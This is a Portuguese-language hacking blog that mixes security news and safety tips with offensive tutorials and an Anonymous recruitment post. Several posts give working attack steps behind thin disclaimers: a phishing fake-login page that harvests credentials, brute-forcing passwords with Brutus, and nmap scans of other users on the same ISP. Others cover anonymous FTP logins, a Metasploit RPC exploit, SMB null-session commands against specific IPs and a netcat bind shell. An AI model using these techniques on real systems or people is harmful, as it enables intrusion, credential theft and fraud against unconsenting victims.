Aprofundando o LOIC...

0 coments

Desde que o grupo Anonymous usou Low Orbit Ion Cannon (LOIC) para atacar uma serie de empresas que entraram no caminho do Wikileaks, este software tem sido o centro das atenções. 
Eu pessoalmente, já o tinha utilizado e posso garantir que é uma ferramenta bastante forte e eficaz... 

Vou vos ensinar como instalar e utilizar, em Linux. Este software é grátis, está disponível para Windows mas
como sabem, quem quer aprofundar o seu conhecimento nestas "artes" nunca use WINDOWS! 


Anonymous disponibiliza o seu próprio sistema operativo?? NÃO!

0 coments


Pessoal a noticia que anda a circular pela Internet de que o grupo Anonymous criou um OS é completamente mentira, tenham atenção pois isto pode ser uma armadilha ou um "opendoors", ou seja, abrir as portas do vosso PC para a "desgraça"... O que é certo é que este OS já vai nos 50mil downloads....

Mesmo sendo falsa a noticia que o grupo Anonymous criou e lançou gratuitamente um SO, o Pirata da Faja
fez download do mesmo e intalou-o numa máquina virtual sem acesso à rede exterior e testou-lo...
O que é certo é que dentro de uma rede de teste que temos montada utilizamos algumas ferramentas e é como digo... Fantástico! 

Mas mesmo assim tenham cuidado.

PF...

Anonymous Portugal

0 coments


Nós somos "Anonymous", lutamos pelos direitos da sociedade e  pela liberdade de informação.
Os fortes e ricos sempre puderam oprimir os pobres, o governo e as grandes empresas sempre puderam fazer tudo sem o povo fazer nada...

Nós Anonymous não admitimos corrupção, nem qualquer tentativa de controlo de informação ou censura da mesma...

Junta-te a nós!  opanonspt.wordpress.com

Nó somos Anonymous
Somos uma legião
Nós não perdoamos
Nós não nos esquecemos

Como fazer um cabo de rede?...

0 coments
Muito simples, basta seguirem a imagem...

Email "virus"

0 coments
Pessoal, à pouco tempo recebi um email de "filomenaconcha@hotmail.com", a dizer que o meu "celular" tinha sido usado para um crime na Internet... Mais uma vez o meu espanto... sem duvida... Em Portugal não existem celulares mas sim telemóveis, e nunca na vida a PSP ou outra entidade policial envia notificações por email...
Enfim, tenham cuidado com este tipo de email, pois ao clicar-mos no link poderá instalar algum virus ou mesmo algum keyloger e o que pensa ser "Hacker" pode ter acesso a toda a nossa informação... Mais uma vez vos digo que um "Hacker" não deixa o seu rasto...   Boas Festas ;) 


Como fazer um Ataque DoS na linha de comandos

3 coments
Por vezes as coisas são mais fáceis do que parecem. Passo a descrever de um modo Informativo , como alguém menos escrupuloso pode fazer um  Ataque DoS com o PC doméstico para qualquer Site !


A INFORMAÇÃO AQUI FORNECIDA TEM COMO FINALIDADE EXCLUSIVA INFORMATIVA E EDUCACIONAL  ESTE BLOG E O SEU ADMINISTRADOR NÃO SE RESPONSABILIZAÇÃO POR QUEM TENTE UTILIZAR ESTE TIPO DE INFORMAÇÃO  AQUI DISPONIBILIZADA, COM MOTIVOS DE ATAQUE.
LEMBREM-SE QUE O MESMO É UM CRIME, E COMO CRIME QUE É DEVEM DE SER DEVIDAMENTE PUNIDOS.



Remover ficheiros "teimosos"...

0 coments
Boas pessoal, agora à pouco estive a fazer um "scan" ao meu PC para limpar dados desnecessarios, cookies, etcetc e deparei-me com um ficheiro que não se deixava eliminar... 

Simplesmente aparecia-me isto quando tentava eliminar...
Como resolver esta situação?? 
Muito simples, fui ao http://www.filehippo.com/ e fiz o download gratuito do UNLOCKER...
Este software é muito eficaz para este tipo de problema...
Resultado final, ficheiro eliminado :)

Cumprimentos,
Pirata da Faja

Os 15 melhores programas gratuitos para hacking de senhas...

1 coments
Mais uma vez, digo-vos: "Conhecimento não é crime".

Penso que todos estarão de acordo comigo, de como "lembrar" senhas para todos os programas e serviços online que são usados muitas vezes em perigo de se transformar numa "missão impossível"!
Numa tentativa de superar este problema, podem usar sempre a mesma senha em todos os lugares e de acesso (no entanto e por razões óbvias não concelho a ninguém) porém, é lamentável que haja sempre  casos excepcionais em que os provedores do serviço não permitem alterar senhas e de uma determinada forma impõem restrições sobre o uso de caracteres.
Então, resumindo e concluindo, tropeçando e não caindo, a moral da história diz-nos que pode acontecer mesmo para os mais diligentes (que talvez também recorrem a um gestor de password) perder ou esquecer a senha de acesso de um determinado site, ou mesmo a sua conta preferida do Instant Messenger ou de e-mail.

Dicionario de segurança

0 coments


Boa Noite pessoal, aqui vai um mini dicionário de segurança para vos "actualizar" melhor a memória ...

Browser

Software que utiliza o protocolo http (Hiper Text Transfer Protocol) para ver páginas Web alojadas em servidores na Internet.

Cavalo de Tróia (Trojan)

Programa informático que tendo aparentemente uma função útil e inofensiva, contém código malicioso ou destrutivo que pode adquirir permissões ilegítimas e provocar danos ao sistema que o aloja ou aos seus dados.

8 Dicas para ficarem seguros e se protegerem de hackers em sites sociais...

0 coments


As  redes sociais têm um papel muito importante a desempenhar em nossa vida, seja Orkut, Facebook ou Myspace entre outros, estes sites servem para beneficiar ambos propósitos como pessoal ou profissional e revelaram-se benéficos para ambos os fins pessoais e profissionais não podemos ignorar o facto. Então, é ruim? De jeito nenhum. Mas temos de ter em mente que nossas informações pessoais estão lá dentro de nosso perfil. Neste mundo de cada vez mais roubo de informação pessoal, temos muito cuidado com a nossa privacidade. Deixo aqui 8 dicas muito úteis para que possam tornar a sua utilização mais segura.

FaceBook cria passwords descartáveis

0 coments

"Esta foi uma das soluções encontradas pelos responsáveis do Facebook para que os utilizadores se sintam mais seguros ao aceder à sua conta partir de computadores públicos.

A ideia é também defender o utilizador de tácitas de keylogging ou seja programas que visam "roubar" palavras-chave do utilizador. O responsável Jake Brill explica no blogue oficial que podem "enviar uma mensagem para o seu telemóvel com uma palavra-chave que pode utilizar uma vez em vez da sua password habitual".



Descobrir senha de alguem??

3 coments
Boas pessoal, hoje falo-vos de uma ferramenta simplesmente interessante, o BRUTUS (Remote Password Cracker)
Com o Brutus vais conseguir "sacar" senhas de utilizadores de http, ftp, pop3, imap, etc etc.

Muito simples -
1- Colocas o "Ip alvo"
2- Escolhes o tipo de protocolo, no meu caso testei em FTP
3- Escolhes a localização onde irás ter um ficheiro .txt onde irá ter uma lista de users (existem na net lista muito boas)
4- Escolhes o tipo de ataque, no meu caso usei o Brute Force.

Depois aparece a senha e user que tentaste "hackear"...
É importante referir que um ataque bem feito pode demorar, horas e talvez dias, tudo depende do vosso alvo :)

Cumprimentos do pirata da faja

Definição de Hacker!

2 coments
Ando eu aqui de ferias numa ilha magnifíca e sem nada para fazer a esta hora decidi dar um pouco de mais vida aqui ao blog :)
Conversando com a minha mente, percebi que muita gente tem uma visão errada acerca do que é um hacker.
O que é ser hacker??. A grande maioria das pessoas tem uma visão errada acerca desta palavra, pensam que Hacker é uma pessoa que tem um extremo conhecimento acerca de informática.
Mas na verdade esta é uma ideia errada. Hacker pode ser uma pessoa que é boa em qualquer coisa, como por exemplo: podes ser um hacker na cozinha, um hacker na guitarra ou até mesmo em tirar fotos para por no facebook (fotos boas claro)

Podes ser um hacker em qualquer coisa, ou seja, ter um extremo conhecimento sobre algo.

Aqui fica esse meu pensamento de madrugada...

Portugal, o sexto pais mais afectado.... (PC´S)

0 coments
Os números são do Relatório de Segurança da Microsoft: em Portugal, em cada mil PCs, 13,6 estão infectados com software malicioso.

O Microsoft Security Intelligence Report foi feito entre Julho e Dezembro do ano passado em mais de 500 milhões de computadores pessoais espalhados pelo mundo.

Com os valores registados, Portugal é o sexto na lista dos que tem mais computadores infectados com software malicioso.

No comunicado oficial da Microsoft pode ler-se uma citação de Sérgio Martinho, responsável pela área de Segurança da Microsoft Portugal: "O Security Intelligence Report promovido pela Microsoft vem comprovar que os cibercriminosos estão a evoluir cada vez mais e a agrupar as ameaças online de forma a criar, actualizar e manter kits de abusos que são vendidos a terceiros. Os criadores de software malicioso estão continuamente a melhorar os seus "produtos" através da introdução de novas actividades abusivas".

A Exame Informática deixa ficar algumas dicas para o ajudar a manter o seu sistema seguro.

Mantenha o sistema operativo actualizado. Certifique-se que as actualizações automáticas do Windows estão ligadas.

Instale software de segurança. Um anti-vírus e firewall. Mantenha-os actualizados com os filtros mais recentes.

Mantenha actualizado (s) o (s) browser (s)

Se o seu computador é utilizado por vários membros da família, crie contas de utilizador para cada uma dessas pessoas com privilégios limitados. Por exemplo, não permita a instalação de aplicações. Mantenha-se como administrador da máquina e não dê a conhecer a sua palavra-passe aos outros utilizadores.

Tenho o cuidado de ter todo o software que utiliza sempre actualizado com as versões mais recentes.

Os cibernautas portugueses são mais inconscientes que os outros? Dê-nos a sua opinião e junte mais algumas dicas de segurança à nossa lista.


Fonte Noticia: Exame Informática

A senha mais usada na internet

0 coments


Por mais estranho que possa parecer, através de uma pesquisa voltou a confirmar-se que a senha mais usada na internet é ... ‘123456′.

Um estudo feito por uma empresa de segurança de dados dos Estados Unidos revelou quais são as senhas mais comuns usadas pelas pessoas para acedem a sites e outros serviços pela internet.

A empresa Imperva analisou 32 milhões de senhas recentemente reveladas após um ataque de hackers ao site RockYou.com.

Na lista, entre as dez senhas mais comuns, estão cinco versões mais longas ou mais curtas da sequência de algarismos de 1 a 9.

Senhas triviais

Em primeiro lugar está a senha “123456″, usada por cerca de 1% dos utilizadores do RockYou.com.

Outras senhas incluem nomes próprios, gírias, palavras conhecidas e senhas triviais, compostas por letras vizinhas no teclado, por exemplo.

O estudo também identificou que muitas das senhas são usadas também noutros sites, incluindo os de redes de relacionamento social e de lojas virtuais.

Em geral, sites recomendam que as senhas contenham algarismos e letras, além de caracteres em letras maiúsculas e minúsculas.

Ataques automatizados
“As pessoas precisam entender que os ciberataques são automatizados: com um mínimo esforço, um hacker pode ganhar acesso a uma nova conta a cada segundo – ou mil contas a cada 17 minutos”, explicou Amichai Shulman, um dos diretores da Imperva.

“O problema mudou muito pouco nos últimos 20 anos”, disse Shulman, referindo-se a um estudo de 1990, que mostrava um padrão de escolha de senhas parecido com os de hoje.

As senhas mais comuns

1. 123456
2. 12345
3. 123456789
4. Password (“senha”)
5. iloveyou (“eu te amo”)
6. princess (“princesa”)
7. rockyou (o nome do site pesquisado)

Pessoal, usem caracteres e numeros nas vossas passw0rds... ;)

Os piores virus de 2009

0 coments
Do perigoso Conficker C ao incompetente RansonK vai uma grande distância - mas ambos têm duas características em comum: são vírus e alcançaram a (má) fama durante 2009.




A Panda Security acaba de dar a conhecer o anuário dos códigos maliciosos mais famosos de 2009.

O ranking não pretende ser um reflexo do grau de perigosidade ou dos estragos causados pelos vírus - apenas enaltece algumas características que distinguem o modo de actuação dos vários códigos maliciosos.

Eis os vírus vencedores de 2009:

1- O mais problemático: Chama-se Conficker.C, iniciou actividade infectante no último dia de 2008. A persistência e a complexidade do código vitimou milhões de computadores domésticos e empresariais. Tem o nome ideal para chamar a alguém numa fila de trânsito.

2- O mais ilusório: Logo na frase de apresentação, Samal.A começa por dizer "Ah ah you didn't say the magic Word" e espera que se introduza uma palavra. Seja qual for a palavra que o utilizador insira, o código responde com "Samael has come. This the end" e o computador é, invariavelmente, reiniciado - e não, não é magia.

3- O mais vingativo: - Chama-se DirDel.A e é um worm que é distribuído através do ficheiro com o sugestivo nome de Vendetta.exe. Distingue-se por trocar progressivamente pastas de várias directorias do Windows por cópias de si próprio. Mais um caso em que a vingança se serve... lenta.

4- O mais viajado: Sinowal.VZR tinha tudo para ser um código malicioso igual aos outros - não fosse o caso de ter sido distribuído através bilhetes de avião electrónicos forjados. Segundo consta, milhares de computadores deixaram de descolar depois da sua passagem.

              LER MAIS

Como funcionam as botnets?

0 coments

As botnets tornaram-se a arma preferida entre os ciber-criminosos para obtenção de lucros fraudulentos sem o conhecimento dos utilizadores.

Ver animação

O que é uma BOTNET?
As botnets são redes de computadores "zombie" controladas remotamente por ciber-criminosos, que as utilizam para lucrar através de uma variedade de actividades criminosas.

Como funcionam?
Os bots são programas pequenos inseridos nos computadores por atacantes, permitindo-lhes controlar o sistema remotamente sem o consentimento ou conhecimento do utilizador. Aguardam nos computadores pelas instruções do seu criador.

Como nos infectamos?
Através de diversos modos: navegando na Web, com um e-mail infectado, transferindo programas por redes P2P, etc.

Como me podem afectar?
Geralmente, os bots não são detectados pelos utilizadores infectados, que tendem a testemunhar apenas as consequências. Normalmente são desenvolvidos para roubar informação dos computadores na botnet, atacar outras vítimas, enviar spam, e lançar ataques de phishing ou de negação de serviços.

Phishing - Criar uma página "Fake Login"

8 coments




1- Seleccionar um site de destino e navegar até uma página de login.
2- Salvar a página inteira: Guardar página como .. (Estou a fazer isto no Firefox .)
3- Passam agora a ter um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos JavaScript. Mudar o nome do arquivo HTML para index.html e criar um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.
4- Criar um arquivo PHP com o nome “phish.php
5- Colar o código abaixo para o arquivo PHP (phish.php) que já fizeram. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redirecciona para o site real.
Desta forma, o utilizador vai pensar que colocou as informações de login errado e terá êxito, a segunda vez que ele for tentar fazer o login será redireccionado para o site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.


6. Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php). Localize o código do formulário no arquivo HTML e alterare o link de acção para o arquivo PHP e do tipo de método de começar assim que as informações apresentadas sejam passados através da URL. O código HTML deve começar com algo



7. Quando tudo estiver concluído, faça o upload dos arquivos para um webhost gratuito que suporte PHP, no meu caso utilizo o APACHE...
8. A partir deste momento, vocês acabaram de saber como de criar uma página de phishing.

PessoaL mais uma vez vos digo, utilizem isto para testes, não aconselho fazerem isto para prejudicar terceiros...

Cumprimentos,
Pirata Da Faja

Técnicas de invasão e defesa

1 coments
Técnicas de invasão e defesaExistem muitas técnicas de invasão e defesa, existem muitas que não são divulgadas na Internet, pois são tão boas e adoráveis que pessoas que descobrem não as divulgam publicamente. Exemplo: Muitos crackers não divulgam as suas técnicas pois seria fodido para eles, pois assim as falhas seriam corrigidas.Vamos acabar com a conversa e partir para a explicaçao.
Não vou falar de todas as tecnicas, até porque eu nao sei de todas existentes. vou falar das mais utilizadas...
Técnicas de Invasão

1º – tem que se definir o alvo
2º – Recolher informações sobre o alvo
3º – Usar ferramentas para a invasão4º – Phishing5º – Esteganografia

<———Tecnicas invasao—————>

1 – definir um alvo

Para definir um alvo, podes usar o google, myspace, orkut, google groups.Exemplo: google* Podes fazer buscas especificas utilizando recursos avançados do google como as tags,Intitle, Inurl, Intext.
Esses recursos podem trazer belos resultados, ou seja, pessoal o GOOGLE É O NOSSO MELHOR AMIGO :)

2 – Engenharia socialengenharia social “é a arte de enganar”Ou seja, através de uma simples conversa de msn podes tentar de forma "manipuladora" recolher algumas informações para te facilitarem a descobrir uma pass ou user (exemplo)

<———Ferramentas para invasão—————>
Existem milhares de ferramentas para penetration(invasão), Porem vou mostrar aqui as melhores, “que eu acho”, (para a ferramenta ser boa, tens que gostar dela! e saber usar).
Dig, Nmap, Nessus, Metasploit, Telnet, Sendip, John the ripper, Host, Hping3, Netcat.=> Dig – É ferramenta quase igual ao nslookup, Porem mais flexível, pode ser utilizada para fazer buscas como A, TXT, MX E NS.

dig +qr google.com any
;; ANSWER SECTION:
google.com. 10186 IN MX 10 smtp2.google.com.
google.com. 10186 IN MX 10 smtp3.google.com.google.com. 10186 IN MX 10 smtp4.google.com.
google.com. 10186 IN MX 10 smtp1.google.com.
google.com. 318637 IN NS ns1.google.com.
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:
smtp1.google.com. 2986 IN A 72.14.203.25smtp2.google.com. 2986 IN A 64.233.167.25
smtp3.google.com. 2986 IN A 64.233.183.25
smtp4.google.com. 2986 IN A 72.14.215.25ns1.google.com. 345220 IN A 216.239.32.10
ns2.google.com. 345220 IN A 216.239.34.10
ns3.google.com. 345219 IN A 216.239.36.10
ns4.google.com. 345219 IN A 216.239.38.10
=>portScan - O portscan vai "batendo" em cada uma das portas e vê quais estão abertas. Um exemplo de portscan é o nmap. Nmap é um brilhante portScan existente no dia de hoje. É uma otima ferramenta, muito utilizada para invasão, para descobrir falhas nos sistemas e descobrir portas abertas desnecessariamente.


=>Nessus - o Nessus é uma ferramentas de auditoria muito usada para detectar e corrigir vulnerabilidades nos computadores da rede local. Nessus encontra bugs e mostra o link de sites para corrigir os BUGS.

=> Metasploit - Esta é a melhor ferramenta que existe. É utilizado para escrever, testar e executar codigos de exploit. Foi desenvolvido para penetração em sistemas através de programas com bugs(erros).
Metasploit > console e interface web.


=> Telnet - É um protocolo para conectares-te remotamente a sistemas.
telnet www.cmpontadelgada.com 80
Trying 200.189.171.181…
Connected to www.cmpontadelgada.com
Escape character is ‘^]’.
GET / HTTP/1.1
Host: www.cmpontadelgada.com

=> John the ripper - É um programa usado para desencriptar senhas unix, dos, winNT win95 e também MD5, DES baseado na função CRYPT.

=> Hping3 - Ferramenta capaz de enviar pacotes TCP, UDP E ICMP personalizados e receber respostas como consegue em icmp. com ele podemos fazer um ataque DoS.

=> Netcat - Programa para consultoria de redes muito
conhecido, isso deve-se ao facto de ele ser um
programa muito versátil.

TROJAN/nc
nc -l -e /bin/bash -p 1033
A porta 1033 será colocada em listenning, redireccionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém
conectar a essa porta terá domínio total sobre
o computador.

Sniffer/nc
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open

=> Phishing - Phishing é um tipo de fraude projectada para
roubar a identidade de alguém. Num phishing scam,
uma pessoa mal-intencionada tenta obter
informações como números de cartões de
crédito, senhas, dados de contas ou outras
informações pessoais convencendo a vitima a
fornecê-la sob pretextos enganosos.=> jp(hide an seek) - O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.


<—————–Técnicas CONTRA-INVASÃO——————->
Firewall
(NHWK)IDS
HoneyPots
Antispam

=> Firewall - Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas só
sejam abertas no momento desejado através
de tentativas de conexão em portas
específicas.

=>(NHWK)IDS –
NIDS – Network Intrusion Detection System
HIDS – Host-based Intrusion Detection System
WIDS – Wireless Intrusion Detection System
KIDS – Kernel Intrusion Detection System

=> HoneyPots - Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor não
tenha acesso á rede real. Pessoal na minha opinião um bom HoneyPot pode levar o Hacker a pensar que está dentro do nosso sistema mas ele está apenas num ambiente virtual :)

=> Antispam - Indispensável para qualquer MX, útil para evitar
email e domínios não confiáveis,
pode ser incrementado com opções de RBL e
CAPTCHA (“Completely Automated Public
Turing test to tell Computers and Humans
Apart”).

Pessoal já sabem alguma duvida podem mandar email que tento ajudar :)

Cumprimentos,
Pirata Da Fajã

Invasão pelas portas 21; 23 ; 135; 445

4 coments
Estou a fazer este tutorial, porque pediram-me. Mas eu odeio este tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar a invadir computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?

Eu mesmo respondo. Estas pessoas são "lammers" que vão tentando invadir tudo e qualquer sistema para se gabar para os seus amigos.

Um conselho para todos vocês que sabem invadir ou estão aprender: TU NÃO PRECISAS de DIZER A NINGUÉM QUE SABES SABE INVADIR, POIS QUANDO SURGIR A OPORTUNIDADE, SURPREENDES OUTRAS PESSOAS!

Um tutorial bem simples que é ainda muito usado nos dias de hoje (por lammers).

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO


Vamos começar:

"saque" o seu ip externo(sugestão: www.myip.com).

Faça download do o nmap e instale no seu pc.

Vamos supor que o teu ip seja: 201.33.22.18.

Entre no prompt do Windows e digite nmap. Aparecerá um montão de opções e ajudas para aprenderes a utiliza-lo.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua "rede WAN" ou seja de todos os computadores que utilizam o mesmo ISP que vocês...

digite:

nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44

Este comando vai listar todos os IP´s (máquinas) que estão a utilizar o mesmo ISP que vocês

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasão pela porta 21

vamos lá… irá aparecer um conjunto de computadores que têm a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. podes tentar fazer login como anonymous, pois alguns administradores ou pessoas não se preocupam em retirar o user anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a

Invasão pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22 23

Invasão pela porta 135

CASO a porta 135 esteja aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexão como: GERENIC\SHELL_BLIND_TCP

depois disso mantenha as informações por defeito do metasploit que só inclua o ip da vitima.

Invasão pela porta 445

Esta porta é de partilha... SMB

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:”"

Comando concluído com êxito.
Faça Download do Dumpusers

guarde no C:\
abra o cmd e digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose

depois vai ao:

iniciar>executar>\\201.45.241.175\c$

Pessoal este tipo de invasão é uma das mais ridículas. Não têm "pica"...
Mas pronto, fiz este tutorial a ouvir um gajo a dizer que na infomática nada é seguro, como se ninguém soubesse.. e o facto de ele dizer que nada é seguro toda a gente olha para ele como se fosse um hacker (para mim é um curioso)...

Cumprimentos...

ClickJacking, um novo perigo na internet...

0 coments

Depois dos trojans e outros códigos maliciosos, a tendência do momento é o clickjacking. Ainda não há correcções definitivas para este problema.

O responsável tecnológico da Whitehat Security, Jeremiah Grossman, explicou à Cnet o funcionamento do clickjacking. O utilizador nem se apercebe, mas todos os seus cliques na Internet podem estar a ser monitorizados por um atacante.

Numa demonstração, Grossman explicou como é simples a um atacante espiar todos os movimentos de um utilizador, recorrendo ao Flash para ligar a sua webcam, sem que este se aperceba.

O atacante cria uma iFrame que coloca no site que pretende atacar. Esse código não é perceptível ao utilizador e é inserido numa parte do site. O utilizador pode estar a clicar em “comprar”, em vez de “cancelar”, se for isso que o atacante tiver escrito no código (o hacker programa os códigos precisamente com o objectivo de ludibriar os utilizadores).

Até agora, há pouco a fazer para evitar este tipo de ataques. As páginas que estiverem optimizadas para Internet Explorer 8 podem não correr estes códigos, mas Grossman adverte que os utilizadores ddo browser da Microsoft devem ter o JavaScript desactivado. No caso do Firefox, basta instalar o add on NoScript, para que se bloqueie o código iFrame.

Fonte exame informatica

Resource Hacker - Edite Progamas .exe

0 coments

O Resource Hacker é uma ferramenta muito interresante para quem trabalha com programação de softwares, ou para quem tem interesse em conhecer como são construidos os programas. Com ela, é possível abrir e modificar arquivos executáveis ( EXE ) . Você poderá fazer várias mudanças, desde comandos internos, até ícones usados pelos aplicativos, e em seguida salvar. Isso é possível, porque o programa possui um descompilador e um compilador interno, que faz com que o aplicativo editado volte a funcionar depois de feitas as modificações. Por Exemplo Como ele pode editar Nome, Imagens e muitas outras coisas de um Servidor, Sendo de Cs, Mu, Ou Habbo, etc, etc

criar calculadora em .bat

0 coments
Pessoal para os iniciantes da programação têm aqui um tutorial muito simples para criarem uma calculadora em .bat, tudo através do bloco de notas :)

Iniciar>executar>cmd>notepad:


@echo off
title Programa que faz calculos by Miguel PEreira
:inicio
cls
echo Digite o numero correspondente ao calculo que queres fazer
echo.
echo.
echo 1-Adicao
echo 2-Subtracao
echo 3-Multiplicacao
echo 4-Divisao
echo.
set /p calculo=
if %calculo%==1 goto adicao
if %calculo%==2 goto subtracao
if %calculo%==3 goto multiplicar
if %calculo%==4 goto dividir
:adicao
cls
echo Digite o primeiro numero que queres somar
set /p n1=
cls
echo Digite o segundo numero
set /p n2=
cls
set /a n3=%n1%+%n2%
echo %n1%+%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit
:subtracao
cls
echo Digite o primeiro numero que queres subtrair
set /p nn1=
cls
echo Digite o segundo numero
set /p nn2=
cls
set /a nn3=%nn1%-%nn2%
echo %nn1%-%nn2%=%nn3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao1=
if %opcao1%==v goto inicio
if %opcao1%==s exit
:multiplicar
cls
echo Digite o primeiro numero que queres Multiplicar
set /p n1=
cls
echo Digite o segundo numero
set /p n2=
cls
set /a n3=%n1%*%n2%
echo %n1%X%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit
:dividir
cls
echo Que numero desejas dividir
set /p n1=
cls
echo Por quanto desejsa dividir
set /p n2=
cls
set /a n3=%n1%/%n2%
echo %n1%:%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit

File>Save As> Salve como: calculadora.bat

Descoberto Trojan que desfalca contas e apresenta extractos falsos

0 coments
O URLZone já começou a fazer vítimas na Alemanha. O trojan mais sofisticado do momento estima quanto dinheiro têm as vítimas e desfalca contas que estão em uso. No final apresenta extractos falsos.

Os trojans libertam os cibernautas do excesso de dinheiro.

A "descoberta" foi feita pela empresa de segurança electrónica Finjan, que analisou o método de ataque do novo código malicioso e já alertou as autoridades alemãs.

Notícia da Cnet revela que o sofisticado Trojan estará a ser comandado a partir de um servidor sediado na Ucrânia.

O código malicioso consegue estimar o dinheiro que cada vítima terá no banco e não só intercepta os códigos de acesso a contas bancárias, como procede ao desfalque ao mesmo tempo que o utilizador acede ao banco via Internet.

Os investigadores da Finjan informam que o URLZone pode entrar em acção em Browsers Firefox e Opera, bem como Internet Explorer 6, 7 e 8.

É especializado em sistemas operativos Windows e tem por ponto de partida um executável que pode ser inserido em páginas com JavaScript, ficheiros PDF, entre outros formatos e tecnologias.

Curiosamente, os investigadores da Finjan conseguiram entrar no servidor que comanda o URLZone (tinha sido deixado a funcionar sem barreiras de segurança...) e descobriram que mais de 90 mil computadores já visitaram sites maliciosos que terão infectado cerca de 6400 máquinas.

Das máquinas infectadas resultaram algumas centenas de contas desfalcadas.

Cuidado Pessoal.

Cumprimentos,
Pirata da Fajã...

Mais um Aviso, email falso...

1 coments
Recebi hoje (4/4/2010) através do Hotmail (ver imagem a cima) , um e-mail curioso " DENUNCIA (A PSP e a Portugal Telecom precisa entrar em conctato consigo urgente.)‏ " e que me chamou à atenção para mais uma obra de algum, não sei bem o que lhe chamar, porque HACKER não é de certeza, chamo mais uns filhos da put... que já deveria ter sido apagado do mapa em vez de andarem a difamar o que pode chamar de HACKER.

Este e-mail é mais uma atentado ao descuido de muitos e que pode vir a trazer problemas a algumas pessoas que não leiam entre as linhas.

Uma das coisa que mais me saltou à vista foi a palavra CELULAR. Ora no meu Português, esta palavra não consta. Onde consta é no Português BR logo aí dá para ver a veracidade do e-mail. Mas para ver os resultados fui um pouco mais à frente para poder de algum modo ajudar quem clicar em SITE.
Se clicarem, vão ser redireccionados não para o site da PT nem da PSP mas sim um site Chinês, que é uma cópia barata do site da PT (ver imagem abaixo) onde consta mais um item que é Crimes na Internet.




Depois de abrir a página para onde me enviava o Link Site, editei o código fonte por curiosidade, e na verdade verifiquei que nele não havia nada que pudesse fazer algum mal. O problema era que passados 60 seg nos solicitava para instalar um plugin do flash que esta a faltar no nosso PC.
Para quem não estivesse atento e clicasse e para instalar o plugin acabava por instalar um keylogger ou um trojan de certeza.
Se tivessem um pouco mais atentos verificavam que o endereço de plugin não era para o site da adob mas sim onde estava alojado o dito keylogger ou trojan.

Pelo facto, se receberem este tipo de e-mail no vosso hotmail o mais fácil é apagar.

Abraços Pessoal e caguem nisso!

Virus Source Code Database - 6000 Vírus activos

0 coments
*** ATENÇÃO ***
O Virus Source Code Database (VSCDB) é apenas com fins de estudo e pesquisa assim como para entusiastas sobre vírus informático. Não será fornecida qualquer garantia implícita ou de qualquer software listagens aqui contidas. Vocês assumem a total responsabilidade por quaisquer danos causados pela elaboração, execução, ou de partilha esta informação.
Estejam cientes de que a execução de qualquer código malicioso no computador ou rede, de outrem pode ser um acto criminoso. Usem por vossa própria conta e risco!

----------------------------------------------------------------------
1. Depois de extraírem não devem de correr qualquer deles.
